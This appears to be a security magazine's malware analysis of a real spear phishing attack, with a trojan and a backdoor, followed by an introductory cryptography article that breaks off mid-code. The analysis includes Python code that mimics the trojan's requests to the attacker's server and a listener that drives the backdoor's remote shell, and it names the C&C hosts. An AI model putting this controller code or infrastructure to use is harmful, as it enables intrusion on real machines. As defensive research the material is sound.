Type "help", "copyright", "credits" or "license" for more information.
>>> from base64 import decodestring
>>> for i in ["dW5zdXBwb3J0", "c2xlZXA=", "Y21k", "cXVpdA=="]: decodestring(i)
...
'unsupport'
'sleep'
'cmd'
'quit'

Figure 7. Code that downloads a file from an attacker controlled server (IDA Pro disassembly of the download handler: the command is parsed with sscanf, then InternetConnectA and HttpOpenRequestA are called with the "GET" and "HTTP/1.1" strings)

Figure 8. Trojan contacting a hard coded server for commands (the aGet, aLogin_html and aHttp1_1 strings are pushed before the WinINet request call)

Figure 9. Fiddler intercepting trojan web traffic

Figure 10. Tokens used to identify commands in the web page (disassembly of handle_command_inpage: strstr locates the SubStr comment marker in the fetched page)





The Backdoor 

After retrieving the new binary from the attacker's specified site, its functional properties and characteristics were quickly studied. Since this binary was deemed hostile, we created a private environment to mimic a command and control server. The binary was modified to connect to our emulated C&C and then executed inside a virtual machine. The following is a summary of the actions that occur without human intervention.

After the backdoor is downloaded and written to the disk of the compromised host, the dropper starts the binary using WinExec. At this point, the backdoor uses WSA sockets to connect to a hard coded server on a specified port. If the backdoor encounters any errors or cannot connect to the server, it self-destructs by deleting the executable image on disk and then exits.

If the backdoor makes a successful connection, it sends the Base64 encoded string connect, upon which the client can send back anything. The functionality of the backdoor is minimal, but the available commands allow the attacker to execute commands on the OS. The backdoor accepts any input, but only processes the cmd or quit commands. If the quit command is specified, the backdoor performs the self-destruct function.

The cmd command invokes the minimal command shell environment. In this environment, the accepted commands are any OS-level command or executable in the current path, cd, or quit and exit. The cd command changes the current working directory of the environment. The quit and exit commands perform the same function of leaving the command shell.

Spear Phishing System Protections

This phishing system appears to be engineered to have a low impact on the entire operation if any of its components is compromised. Additionally, the components hide in plain sight, and none of the items were identified by anti-virus (AV) or host intrusion prevention systems (HIPS). These observations stem from the fact that the servers went untouched for nearly a week after the initial analysis of the operation commenced. There was an attempt to identify other servers using a similar control channel through search engines, but search engines do not retain HTML comments as searchable metadata. The alternative to search engines is to spider hosts' web pages across the Internet and look for the Base64 comments in each page. Given the timeframe of this analysis, the latter was not a viable option.

With regard to the binary protections, the initial dropper is a CHM that placed a basic trojan on the disk. The trojan is an unpacked and unencrypted binary, and it communicates with the attackers using plaintext encoding. When the trojan exits, it does not delete itself from the disk and starts up again on reboot. No threads or CRC checks monitor the binary for changes.

Figure 11. Immunity Debugger displays the command parsed by the trojan (the debugger is stopped around the WININET.HttpSendRequestA and InternetReadFile calls, with the comment-delimited command visible in the hex dump)

Figure 12. Elapsed commands between the client and server

Figure 13. Second attempt to retrieve the binary (Python session: connect_send("www.holdent.com.au", "/error.jpg") sends GET /error.jpg HTTP/1.1 with User-Agent +Windows+NT+5.1 to Host 203.220.22.138; the response is HTTP/1.1 404 Not Found)



The backdoor that is downloaded 
in the later phase of the attack is also 
an unprotected binary. It is not packed 
nor is it encrypted. The backdoor also 
communicates with attacker's servers 
using plain text channels. Unlike the trojan, 
the backdoor does delete itself from disk 
on exit or when it encounters an error. 

Spear Phishing System Detailed Analysis

In this section, the analysis methodology is explained. This section highlights the tools and process utilized to perform the analysis of the spear phishing attack. The analysis placed an emphasis on several areas. The objective of the analysis is to identify any clues about the attackers and the functionality of the system, so that an adequate response can be performed, and then to identify any vulnerabilities that would allow a penetration into the attackers' network.

Analyses of the various components were not performed in the order they are laid out in the following sub-sections, but the sub-sections detail how the analysis is performed and what information is gained by it. The first sub-section discusses information yielded from a covert external analysis of the web servers. The following subsection focuses on the dropper and the trojan used by the attackers, and the final subsection pertains to the analysis applied to the backdoor retrieved from the attackers' site.

Server Analysis 

The analysis methodology applied to the web servers was black box in nature, because there was no access to the systems. Also, the analysis focused on being covert about the analysis and reconnaissance. The results of the server analysis are based on metadata collected and inferences drawn from that information. There are three web servers. Based on the results of HTTP HEAD requests, all three servers were profiled as Microsoft IIS 6.0 web servers, which implies that the servers are running the Microsoft Server 2003 operating system.

The server the trojan polls, 203.220.22.138, has been up and running since Thu, 16 Oct 2008 11:02:56 and resolves to www.techsus.com.au. A quick Google search of this IP reveals that it has been maliciously active for a while. A McAfee signature shows backdoor activity from it in September 2007 (Backdoor-DMG, McAfee Inc., http://vil.nai.com/vil/content/v_143081.htm). The server that hosted the backdoor for download had its index page modified recently, and it appears to also be hosting command and control information in its page, as shown in Figure 4. The server that the backdoor connects to, 63.228.128.19, has been running since Mon, 25 Jun 2007 13:06:04 GMT. The results of our HEAD requests can be seen in Figure 4.




Figure 14. Download command received from the server (the page begins with an HTML comment holding the Base64 encoded download command, ahead of the <html> and <head> tags)

Figure 15. Fake trojan request and sleep command response (the monitoring script sends GET /login.html HTTP/1.1 with User-Agent +Windows+NT+5.1 to Host 203.220.22.138 and receives HTTP/1.1 200 OK from Server: Microsoft-IIS/6.0, Last-Modified Fri, 12 Jun 2009 16:05:56 GMT, followed by the Base64 sleep command in the page comment)



Primary and Secondary Payloads Analysis

The file type of the attachment in the phishing email is identified as a Microsoft Compiled HTML Help (CHM) file. These types of files are generally used by applications in Microsoft Windows environments to offer help, and they can also be a mechanism for delivering e-books. To dump out the contents of the CHM file, we used CHMDumper, available only on the Mac platform. This application yielded a set of files and directories, but the files that yielded the most information were the embedded trojan executable and the HTML file used to start the trojan. The figure on the next page shows the files that were dumped by CHMDumper, but the emphasis of the analysis is placed on svchost.exe and FRB Conference on Key Developments in Monetary Economic.htm. Figure 3, shown previously in The Primary and Secondary Payloads in The Staged Attack: Functional Analysis section, shows the smoking gun that starts the trojan's execution.

Static analysis is used first to identify whether the binary has any protections and then to pinpoint any interesting strings or functions. The first step in analyzing the trojan is to apply the Unix strings utility to it, which shows that the binary is not protected and also reveals useful command and control data. Several strings of interest stood out: one set turned out to be Base64 encoded commands, the others were an IP address and a URI. We also notice the use of HTTP and of the WinINet API from the imports table, as shown in Figure 6.



from socket import *
from base64 import *
from time import sleep
import datetime

# Python 2 code as shown in the original figure (print statements, base64.decodestring).

def connect_send(host, uri):
    # The request line was cut off in the screenshot; the User-Agent and Host
    # headers are completed from the request captured in Figure 15.
    req = 'GET %s HTTP/1.1\r\nAccept: */*\r\nUser-Agent: chairmen-george+Windows+NT+5.1\r\nHost: %s\r\n\r\n'
    request = req % (uri, host)
    print "Sending the following.\n host: %s\nrequest %s" % (host, request)
    s = socket(AF_INET, SOCK_STREAM)
    s.connect((host, 80))
    s.send(request)
    return s

def get_cmd(data):
    # The command sits Base64 encoded between the trojan's comment tokens.
    cmd = data.split("<!--")[1].split("--!>")[0]
    cmd2 = decodestring(cmd)
    print "Got %s %s" % (cmd, cmd2)
    return cmd, cmd2

def cmd_sleep(value):
    # s:<value> -- the client waits twice the given number of seconds.
    t = int(value)
    t = 2.0 * float(value)
    sleep(t)

def cmd_download(values):
    # d:<host> <uri>
    dst, uri = values.split(":")[1].split()
    return dst, uri

def check_sleep(cmd):
    if len(cmd.split(":")) > 0 and cmd.split(":")[0].lower() == 's':
        return True
    return False

def check_download(cmd):
    if len(cmd.split(":")) > 0 and cmd.split(":")[0].lower() == 'd':
        return True
    return False

Figure 16. Basic implementation of the trojan written in Python



After using strings to gain insight into the trojan, the binary is loaded into IDA Pro to identify how the binary uses the noted strings, as well as to perform the static code analysis. The IDA Pro analysis helped to identify the routines responsible for sending the initial connection to the login page, as well as the functions responsible for downloading another component of the malware system. Figure 8 shows what host the trojan contacts in order to get a new command from the attacker, and Figure 7 shows the routine responsible for the download. At this point, GNU Wget is used to grab a copy of the page shown in Figure 8. Initially, the commands in the page were not evident, but after consulting IDA Pro once more, the tokens used by the trojan became apparent. Figure 10 shows the block of code responsible for retrieving the commands from the web page. The tokens (<!-- and --!>) are treated as comment delimiters and are not parsed by the browser, so the commands do not show up in the HTML rendering.

Dynamic analysis is employed to verify the previous assumptions and then to identify any functionality that may have been missed in the static analysis. For the live analysis, a virtual machine with Immunity Debugger and Fiddler was used.

Breakpoints were placed on the interesting points discussed earlier. Since the trojan is using the WinINet API, the Fiddler Web Debugger program was used to monitor communication between the trojan and the web server.

Figure 9 shows Fiddler in action as it intercepts web requests between the attacker's server and the trojan. This method helped to identify the custom HTTP User-Agent header used by the trojan.
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[IDA Pro .data listing, Figure 17; addresses and cross-references are illegible in the scan]
        db 'c2xlZXA=',0
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        ; Base64 Decode Command: sleep


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align 4 




aY21k   db 'Y21k',0
        ; Base64 Decode Command: cmd
        align 4
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        db 'cXVpdA==',0


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        ; Base64 Decode Command: quit
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Figure 17. Commands found in the backdoor binary 
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When the host is compromised by the trojan, the trojan sets the User-Agent header to hostname+Windows+NT+5.1; for example, a User-Agent of apridgen-e8fb8+Windows+NT+5.1 means the hostname is apridgen-e8fb8. After using Immunity Debugger to verify the inputs as shown in Figure 11, focus shifted to obtaining the next binary.

Once there was an understanding of how the trojan worked, several requests were made to the attacker's server, but the web page command did not change over a period of about twenty minutes. Due to the uncontrollable nature of the trojan, a Python implementation of the trojan client was developed. The client only used the sleep and download functions, and the requirements for the functions were derived from the analysis provided by IDA Pro.

After testing a few iterations of the client, it was left to run unattended. Figure 16 shows a screen capture of the final client for the trojan. Figure 15 shows a captured request between the trojan client and the web server. The trojan request is highlighted in the blue box, and the command embedded in the server's response is highlighted in the red box. After about six hours of polling the site, the command changed into a download command, as shown in Figure 14. Figure 12 shows the elapsed time from when the script started up until the download command was issued. Figure 13 on the previous page shows the HTTP 404 response received after trying to retrieve the binary for a second time.

Backdoor Analysis 

The binary file obtained was identified using the Unix file command and then analyzed with strings. Some of the strings found in the binary resembled the ones found in the trojan, because they were Base64 encoded. Another string of notable interest was a hard coded IP address and port. Further analysis showed that this server and port were the callback destination once the binary executed. Figure 17 shows commands seen in the trojan that are also present in the backdoor. This relationship has led to the assumption that the backdoor and the trojan are part of a similar code base.

After the initial static analysis, similar to what is described in the previous subsection, a virtual environment was set up so that the backdoor could be analyzed. The environment consisted of an Ubuntu box with Apache installed, and then a command page based on the login.html initially encountered. Then the trojan and backdoor were modified to keep the traffic internal to the test network. The malware was modified using Radare as shown in Figure 18.

After modifying the HTML command page, the trojan, and the backdoor, they were placed in the web directory of the Apache server, and the live analysis was performed. The trojan is then downloaded to the test host and executed, simulating the phishing attack. Once executed, svchost.exe polls the web server it has been modified to contact. The hard coded HTML page commands the trojan to download the backdoor and execute it.

After the backdoor executes, Immunity 
Debugger is attached to the process. As 
mentioned previously, if any errors are 
triggered in the backdoor, it self-destructs 
and deletes itself from the host's disk. 



[Figure 18 residue: two Radare hex dumps of the trojan's .data section starting at 0x00401418. The first shows the C&C server address as found in the binary; the second shows the same bytes after modification, now holding the test server address 172.16.51.9. Further down the dump the polled path /login.html, the Base64 command strings (c2xlZXA=, Y21k and cXVpdA== among them), the User-Agent fragment +Windows+NT+5.1, the request template GET ... HTTP/1.1, the comment tokens <!-- and --!>, the value name Update and the registry path Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run are visible.]

Figure 18. Trojan modification in Radare
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[Figure 19 residue: the head of the modified login.html page (HTML 4.01 Transitional DOCTYPE, Content-Type meta with charset windows-1252, <title>Login</title>, the techsus.css stylesheet and favicon links, and the start of a popup() JavaScript function); the command token itself is not legible in the scan.]

Figure 19. Commands on a modified login.html page
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[Figure 20 residue: two length-prefixed Base64 messages from the backdoor, a "path not found" error text and the current working directory prompt; the raw Base64 is omitted.]

Figure 20. Standard backdoor messages

Errors that were encountered resulted from 
mistakes in modifying the binary and not 
having a listener available. 

In an effort to speed up analysis of the binary's functions, a basic server for the backdoor was implemented in Python. The implementation handles listening, receiving, and decoding messages, along with encoding and sending commands back to the backdoor.

Figure 21 shows a screen shot of some of the functions that were used. As a brief overview of the code, setup_listener listens for the connection on the specified IP and port. The recv_data function receives incoming data on the initialized socket, and get_next_string reads the message size and then Base64 decodes the next N characters. Figure 21 shows what a typical message looks like before it is processed. The first four characters give the size in ASCII format, and the string of that length which follows is processed as data from the backdoor. Finally, send_cmd takes a command string and a socket and sends the backdoor a Base64 encoded command over the established socket.
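The framing just described, as an added Python 3 example that is not the article's own listener code: a four-character ASCII length field (NUL padded) followed by that many characters of Base64. The sample messages are constructed here; only their decoded contents are taken from Figure 20.

```python
import base64

# Frame layout described in the text: a four-character ASCII length field
# (NUL padded) followed by that many characters of Base64 text.
HEADER_LEN = 4


def frame_message(payload: bytes) -> bytes:
    """Build one message the way the backdoor does (added example, not its code)."""
    body = base64.b64encode(payload)
    if len(body) > 9999:
        raise ValueError("Base64 body longer than a 4-character length field allows")
    header = str(len(body)).encode("ascii").ljust(HEADER_LEN, b"\x00")
    return header + body


def parse_frames(buf: bytes):
    """Split a receive buffer into decoded messages.

    Returns (messages, remainder). An incomplete trailing frame is kept in the
    remainder so the caller can append the next recv() and parse again; the
    original get_next_string re-reads the socket once and then slices anyway.
    """
    messages = []
    while len(buf) >= HEADER_LEN:
        header = buf[:HEADER_LEN].split(b"\x00")[0]
        if not header.isdigit():
            raise ValueError("corrupt length field: %r" % header)
        size = int(header)
        if len(buf) < HEADER_LEN + size:
            break                       # rest of this frame not received yet
        body = buf[HEADER_LEN:HEADER_LEN + size]
        messages.append(base64.b64decode(body, validate=True))
        buf = buf[HEADER_LEN + size:]
    return messages, buf


def receive_messages(recv, bufsize=8192):
    """Drain a recv callable (e.g. sock.recv) until it returns b"" and decode
    every complete frame seen, however the stream was split into reads."""
    buf, out = b"", []
    while True:
        chunk = recv(bufsize)
        if not chunk:
            break
        buf += chunk
        messages, buf = parse_frames(buf)
        out.extend(messages)
    if buf:
        raise ValueError("connection closed with %d bytes of a partial frame" % len(buf))
    return out


# Constructed sample: the two messages Figure 20 describes, an error text and
# the command prompt (the real backdoor sends their Base64 equivalent).
SAMPLE_STREAM = (
    frame_message(b"The system cannot find the path specified.\r\n")
    + frame_message(b"C:\\Documents and Settings\\Administrator\\Desktop>")
)

if __name__ == "__main__":
    # Deliver the stream in awkward pieces to show that re-assembly works.
    chunks = [SAMPLE_STREAM[:30], SAMPLE_STREAM[30:70], SAMPLE_STREAM[70:], b""]
    for message in receive_messages(lambda n: chunks.pop(0)):
        print(message.decode("ascii").rstrip())
```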

Figure 21 shows a custom backdoor listener in action. Line 302 shows the listener being set up and waiting for the connection. Line 303 shows a cmd command being sent to the backdoor. This command invokes the backdoor's command environment. The rubbish (e.g. dir C:\) is ignored by the command initialization routine. Here it shows the initial connect string sent by the backdoor followed by a Base64 encoded prompt with the current working directory. Line 305 shows a listing of the current working directory. Lines 306 and 309 process the command and print it, respectively. Other commands in this backdoor's environment include cd, which changes the current working directory, and quit and exit, which leave the environment. The only other command the backdoor seemed to respond to was the quit command. This command makes the backdoor self-destruct and exit. Any other input to the backdoor was simply ignored.

Mitigations 

Spear phishing attacks do not require any sophisticated tools or techniques. Much of the material covered in this document is well known as a means of gaining access and taking over a system. Furthermore, the binaries employed in this case were not sophisticated, nor were they protected. An additional note about the binaries is how easily they can be modified with a hex editor: the source code is not necessary to customize the attack or deploy the binaries, because an attacker can edit the binaries to suit their needs.

Preventative measures required to mitigate this threat require user awareness and training in addition to drills that test



from socket import *
from base64 import encodestring, decodestring

# Python 2 code as shown in the original figure.

def setup_listener(host_info):
    s = socket(AF_INET, SOCK_STREAM)
    s.bind(host_info)
    s.listen(1)
    x = s.accept()                   # (connected socket, peer address)
    return x

def connect_cmd(sock):
    sock.send('Y29ubmVjdA==')        # Base64 of "connect"

def start_cmdshell(sock):
    sock.send(encodestring("cmd").replace("\n", ''))

def get_next_string(d, s):
    # First four characters: message size in ASCII, NUL padded.
    l = d[:4]
    l = l.split('\x00')[0]
    if len(d[4:4+int(l)]) != int(l):
        d += s.recv(8096)            # message continues in the next read
    x = d[4:4+int(l)]
    return x, d[4+int(l):]

def recv_data(s):
    data = s.recv(8096)
    results = []
    d = data
    while d != '':
        r, d = get_next_string(d, s)
        results.append(decodestring(r))
    return results

def send_cmd(c, s):
    s.send(encodestring(c).replace("\n", ''))

Figure 21. Basic backdoor listener and server implementation in Python
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the response of IT staff and users (Rachna Dhamija, J.D. Tygar, and Marti Hearst, "Why Phishing Works", CHI 06: Proceedings of the SIGCHI conference on Human Factors in computing systems, 2006). Additionally, host based firewalls and network proxies can limit the ability of rogue programs to create network connections. Sophisticated systems can bypass these protections, but such technology would have limited this attack. Detective measures are limited. In this particular case, since the commands of the trojan are limited and embedded in a known token, web pages can be checked for those particular strings. Another detective measure is noticing the trojan, svchost.exe, running as the logged-in user, as shown in Figure 23. Auditing and monitoring programs that run at start-up is another measure of detection. Detecting



In [302]: s, addr = setup_listener(('172.16.51.9', 443))

In [303]: send_cmd('cmd dir C:\\', s)

In [304]: s.recv(8096)
Out[304]: (the connect string Y29ubmVjdA== followed by the Base64 encoded prompt; see Figure 20)

In [305]: send_cmd('dir C:\\', s)

In [306]: f = recv_data(s)

In [309]: print ''.join(f)
 Volume in drive C has no label.
 Volume Serial Number is (illegible)

 Directory of C:\

(dates and times illegible in the scan)
                                    0 AUTOEXEC.BAT
                        <DIR>         Brother
                                    0 CONFIG.SYS
                        <DIR>         Data
                        <DIR>         Documents and Settings
                        <DIR>         peach
                        <DIR>         Program Files
                        <DIR>         Python
                        <DIR>         Python25
                        <DIR>         WINDOWS
               2 File(s)              0 bytes
               8 Dir(s)  35,535,245,312 bytes free
C:\Documents and Settings\Administrator\Desktop>

Figure 22. Python implementation of the backdoor listener environment



[Figure 23 residue: Windows Task Manager, Processes tab, with "Show processes from all users" ticked (41 processes, CPU usage 25%, commit charge 289M / 2748M). The legitimate svchost.exe instances run as SYSTEM or NETWORK SERVICE; svchost[1].exe, the trojan, runs as Administrator. The annotation reads "After Download of the Update".]

Figure 23. svchost.exe running as the user



the backdoor may follow a rather different course of action. If the backdoor communicates over port 443, as it did in this case, the Base64 plaintext could be considered an anomaly.
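The two indicators this section names, the comment-delimited Base64 tokens in a page and the hostname+Windows+NT+5.1 User-Agent, as an added detection example in Python 3 (not code from the article). The page body and proxy log lines are constructed; the command grammar (s:<seconds>, d:<host> <uri>, cmd, quit) is the one recovered in the analysis above.

```python
import base64
import re

# Command token the analysis recovered: a Base64 string wrapped in the
# trojan's comment delimiters, invisible in the rendered page.
TOKEN_RE = re.compile(rb"<!--\s*([A-Za-z0-9+/=\s]+?)\s*--!>")

# The trojan's User-Agent is <hostname>+Windows+NT+5.1; in a combined-format
# proxy log it is the last quoted field of the line.
UA_RE = re.compile(r'"([^"\s]+)\+Windows\+NT\+5\.1"')


def decode_command(token: bytes):
    """Decode one token. Returns (kind, detail) or None if it is not a command."""
    token = re.sub(rb"\s+", b"", token)
    token += b"=" * (-len(token) % 4)          # tolerate stripped padding
    try:
        clear = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    # Grammar recovered from the trojan: s:<seconds> and d:<host> <uri>
    head, sep, rest = clear.partition(":")
    if sep and head.lower() == "s" and rest.strip().isdigit():
        return ("sleep", int(rest))
    if sep and head.lower() == "d" and len(rest.split()) == 2:
        host, uri = rest.split()
        return ("download", (host, uri))
    if clear in ("cmd", "quit"):               # strings shared with the backdoor
        return (clear, None)
    return None


def scan_page(html: bytes):
    """Return every decoded command token found in a page body."""
    hits = []
    for match in TOKEN_RE.finditer(html):
        cmd = decode_command(match.group(1))
        if cmd is not None:
            hits.append(cmd)
    return hits


def scan_proxy_log(lines):
    """Return (line number, hostname) for log lines carrying the trojan's User-Agent."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = UA_RE.search(line)
        if match:
            hits.append((number, match.group(1)))
    return hits


def _token(command: str) -> bytes:
    return b"<!--" + base64.b64encode(command.encode("ascii")) + b"--!>"


# Constructed sample page: an ordinary comment, a sleep token, a download
# token and a Base64 comment that is not a command.
SAMPLE_PAGE = (
    b"<html><head><title>Login</title></head><body>\n"
    b"<!-- site navigation -->\n"
    + _token("s:120") + b"\n<p>Welcome</p>\n"
    + _token("d:c2.invalid update.exe") + b"\n"
    + _token("hello") + b"\n</body></html>\n"
)

# Constructed proxy log lines; the hostnames match the examples in the text.
SAMPLE_LOG = [
    '10.1.1.7 - - [13/Jun/2009:01:50:10 +0000] "GET /login.html HTTP/1.1" 200 6371 "-" "apridgen-e8fb8+Windows+NT+5.1"',
    '10.1.1.8 - - [13/Jun/2009:01:50:12 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 5.1)"',
    '10.1.1.9 - - [13/Jun/2009:01:51:03 +0000] "GET /login.html HTTP/1.1" 200 6371 "-" ",+Windows+NT+5.1"',
]

if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_PAGE):
        print("page token:", kind, detail)
    for number, host in scan_proxy_log(SAMPLE_LOG):
        print("log line %d: trojan User-Agent from host %r" % (number, host))
```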

Conclusion 

This report covers the analysis of a real-world spear phishing attack. To analyze this attack we performed static analysis of all binaries, dynamic analysis of all executables, modified executables for dynamic manipulation in a controlled environment, and performed basic reconnaissance against live C&C hosts.

The tools and techniques were well organized and carefully crafted for a low noise attack. The attacker demonstrated experienced use of Windows based network communication and command execution. He further demonstrated basic knowledge of botnet command and control, which he implemented in an effective toolkit. The toolkit does not appear to utilize code from public or well-known botnets, and lacks sophisticated exploitation and protection mechanisms. The attacker also successfully established C&C servers and hid his identity. This leads us to believe the attacker is actually an experienced criminal organization that carefully targeted the financial organization.

The authors are not aware of how the attack was initially detected. A few notable activities may have alerted security, such as a CHM file being blocked at the email filter, the files being written and undeleted from disk, the dropper immediately writing to the registry, or HTTP traffic over port 443 rather than HTTPS. However, we have seen similar malware effectively used on other systems - usually without any detection. We recommend standard mitigation such as continued user awareness training, up-to-date antivirus software, host based firewalls limiting outbound connectivity, and network proxies that limit and monitor traffic.
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Difficulty

WHAT YOU WILL LEARN...

Understand the different forms and applications of cryptographic methods

WHAT SHOULD YOU KNOW...

No specific knowledge required



Methods of Secrecy



Keeping data secret has been important from the very moment 
knowledge was able to confer a benefit to others. Ancient 
Roman ruler Julius Caesar used an encryption scheme called a 
substitution cipher. 



Keeping data secret has been important 
from the very moment knowledge was 
able to confer a benefit to others. Ancient 
Roman ruler Julius Caesar used an encryption 
scheme called a substitution cipher - Suetonius 
described it as the following: 

If he had anything confidential to say, he wrote 
it in cipher, that is, by so changing the order of the 
letters of the alphabet that not a word could be 
made out If anyone wishes to decipher these, and 
get at their meaning, he must substitute the fourth 
letter of the alphabet, namely D, for A, and so with 
the others. 

Encryption ciphers like the one used by 
Caesar are but one of the most primitive of 
methods which can be used for keeping data 
safe. This article is the beginning of a series which 
will introduce you to a variety of topics related to 
data security. 

Let's go key-sharing 

One of the effective ways to keep data secret involves keeping others away from it. If the document is enclosed in an opaque box which you can't open, you can't read it - nothing simpler than that.

Symmetric key algorithms can be considered 
digital implementations of the aforementioned 
box. Two individuals agree on key X. The sender 
then encrypts the message using the key and 
the receiver decrypts it using the same key: see 
Figure 1. 



Block ciphers are among the most easy- 
to-understand algorithms. They take a key and 
the same number of bytes of payload and then 
perform whatever processing they feel like in order 
to combine the bytes. The receiver then reverses 
the processing to split data and key and ends up 
with the original data once again. 

Various block ciphers like AES, Blowfish and the DES variants are currently used on the market.

Unfortunately, useful data payloads rarely come in 64, 128 or other fixed-size bit packages, and tend to be significantly longer than the key used for encryption purposes. Various methods like ECB are used to stretch the key, each with its own strengths and weaknesses - but more on that later.

Stream ciphers use the aforementioned key 
to seed an algorithm which generates an infinite 



Warning 

NIH syndrome tends to be lethal when cryptography 
is concerned. The development of successful and 
safe encryption algorithms is a science of its own. 
Detecting algorithmic flaws is extremely difficult 
for untrained programmers - an algorithm which 
looks safe to you can have extremely dangerous 
properties. 

As many high-quality cryptographic algorithms are available as open-source libraries (and sometimes even come as part of an OS or runtime environment), Joe Coder should not and MUST NOT attempt to write his own!
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(but deterministic) stream of bytes out of the seed, and then uses this stream to encrypt the payload on a byte-by-byte level. The receiver initializes his copy of the generator algorithm with the same value, reverses the processing and ends up with the payload (as the byte sequence is the same).

Most encryption methods currently on the market use symmetric key algorithms. In general, the security of data encrypted with these systems depends on both the algorithm used and the length of the key - the stronger the algorithm and the longer the key, the longer it takes to perform a brute-force attack to decrypt the cipher text by force.

Key-Sharing, no More 

Unfortunately, all of the above-mentioned algorithms share one weakness: an encryption key must be transferred secretly from one partner to the other. As this involves the creation of a secure channel, why not transfer the data unencrypted rather than wasting loads of CPU cycles on encryption and decryption?

OK, this might be a bit far-fetched - but it illustrates the main and conceptual weakness of so-called symmetric key algorithms. Asymmetric key cryptography is smarter - it uses a public and a private key and a public repository.

Data is put into the repository via the public key, which is published to the world. Decrypting the data in the repository, however, requires the private key - which, obviously, is not published. The chart explains the process further (see Figure 2).

The most popular example for 
this process is a program called 
PGP (Pretty Good Privacy). PGP users 
generate a key pair, and upload the 
public key to a server. Others then use 
this key to generate ciphertext, which 
is emailed to the owner of the key. He 
then decrypts it via his private key (see 
Listing 1). 

Unfortunately, these systems do 
come at a price: their CPU utilization 
is significantly higher than the CPU 
utilization caused by symmetric key 
algorithms. A test performed by the 



security researchers Daswani and Boneh 
showed that RSA (an asymmetric key 
algorithm) was about 1000 times slower 
than DES. 




Figure 1. Symmetric encryption algorithms use one shared key. Data can be read by everybody who has this key.

Sender  ->  Receiver
Original --[public key]--> Encrypted --[private key]--> Original

Figure 2. Asymmetric encryption systems use two keys. One is used for encrypting, the other for decrypting.

Figure 3. Image from http://en.wikipedia.org/wiki/File:Cap_code_screenshot.jpg
CAP: dots embedded into pictures show where a film came from

Furthermore, the question of key management remains: how do you know whether the public key you find on a server really belongs to the intended
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Listing 1. PGP generates "key pairs". One is private, the other public

C:\Program Files\GNU\GnuPG>gpg --gen-key

gpg (GnuPG) 1.4.10; Copyright (C) 2009 Free Software Foundation, Inc. 
This is free software: you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. 

Please select what kind of key you want: 

(1) RSA and RSA (default) 

(2) DSA and Elgamal 

(3) DSA (sign only) 

(4) RSA (sign only) 
Your selection? 1 

RSA keys may be between 1024 and 4096 bits long. 
What keysize do you want? (2048) 2048 
Requested keysize is 2048 bits 
Please specify how long the key should be valid. 
0 = key does not expire 

<n> = key expires in n days 

<n>w = key expires in n weeks 

<n>m = key expires in n months 

<n>y = key expires in n years 
Key is valid for? (0) 0 
Key does not expire at all 
Is this correct? (y/N) y 

You need a user ID to identify your key; the software constructs the user ID 
from the Real Name, Comment and Email Address in this form: 
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf.de>"

Real name: hakin09 tester 
Email address: test@example.com 
Comment: none 
You selected this USER-ID: 

"hakin09 tester (none) <test@example.com>"

Change (N)ame, (C)omment, (E)mail or (O)kay/(Q)uit? O
You need a Passphrase to protect your secret key. 

We need to generate a lot of random bytes. It is a good idea to perform 
some other action (type on the keyboard, move the mouse, utilize the 
disks) during the prime generation; this gives the random number 
generator a better chance to gain enough entropy. 
. . . .+++++ 
+++++ 

We need to generate a lot of random bytes. It is a good idea to perform 
some other action (type on the keyboard, move the mouse, utilize the 
disks) during the prime generation; this gives the random number 
generator a better chance to gain enough entropy. 

+++++ 

. . . +++++ 

gpg: C:/Documents and Settings/TAMHAN/Application Data/gnupg\trustdb.gpg: trustdb created

gpg: key 9B3349A7 marked as ultimately trusted 
public and secret key created and signed. 



gpg: checking the trustdb
gpg: 3 marginal(s) needed, 1 complete(s) needed, PGP trust model
gpg: depth: 0  valid:   1  signed:   0  trust: 0-, 0q, 0n, 0m, 0f, 1u
pub   2048R/9B3349A7 2009-11-06
      Key fingerprint = 40BD BC60 A224 4B87 9781 9CD6 CCA4 7183 9B33 49A7
uid                  hakin09 tester (none) <test@example.com>
sub   2048R/27F27207 2009-11-06



C:\Program Files\GNU\GnuPG> 



recipient, and that the corresponding 
private key has not been compromised? 

Value is in the Eye of the Beholder

Present-day encryption algorithms 
such as the ones which will be covered 
in the next parts of the series have 
now reached a point where attacking 
them computationally is no longer 
feasible. Instead, attackers who fail at 
social engineering employ methods 
euphemistically called black-bag and 
rubber hose cryptanalysis. 

The first of the two involves sneaking up to the terminal where the data is being used, and monitoring it in some way. Various methods have been devised over the years: they range from mundane things like keyloggers and cameras to exotic high-tech maneuvers like analyzing the sounds of key strokes or electromagnetic emissions from monitors. Rubber-hose cryptanalysis is simpler: it refers to hitting the owner of the password (and the owner's family and friends, for the communistically inclined) with a rubber hose until he gives up and discloses the access codes.

Rubber hose and black-bag 
cryptanalysis rely on one thing: the 
attacker needs to know that data is there. 
If the attacker doesn't know that hidden 
information exists (or thinks that he has 
already decrypted it), the owner of the 
information gets left alone. 

Steganography involves the hiding of payload information in another transfer medium which is meaningful in itself. For example, ancient Greeks shaved the heads of their slaves and tattooed the message onto their skull. As human hair has a tendency to grow, the message was soon invisible - and nobody really cared about the exchange of a piece of human farm equipment back then.

As slaves have become somewhat 
rare nowadays, present-day steganography 
uses carrier files which contain large 
amounts of redundant data (usually images 
and MP3 files), and embeds the information 
into them. By keeping the relationship 
between payload and original data in 
check, the original file is not distorted in a 
visible fashion - nobody would ever expect 
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to find a hidden message embedded into 
that shot of a Viennese church. 
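A minimal version of the embedding just described, as an added Python 3 example that is not part of the article: the payload goes into the least significant bit of successive carrier samples, so no sample moves by more than one step. The carrier bytes are constructed stand-ins for the raw samples of an image or audio file.

```python
def _bits(data: bytes):
    """Yield the bits of data, most significant bit of each byte first."""
    for byte in data:
        for i in range(7, -1, -1):
            yield (byte >> i) & 1


def embed_lsb(carrier: bytes, payload: bytes) -> bytes:
    """Hide payload in the least significant bit of successive carrier samples.

    A 4-byte big-endian length header precedes the payload so the extractor
    knows where to stop. Each sample changes by at most 1, which is invisible
    in 8-bit image or audio data.
    """
    data = len(payload).to_bytes(4, "big") + payload
    needed = len(data) * 8
    if needed > len(carrier):
        raise ValueError("carrier too small: need %d samples, have %d" % (needed, len(carrier)))
    out = bytearray(carrier)
    for index, bit in enumerate(_bits(data)):
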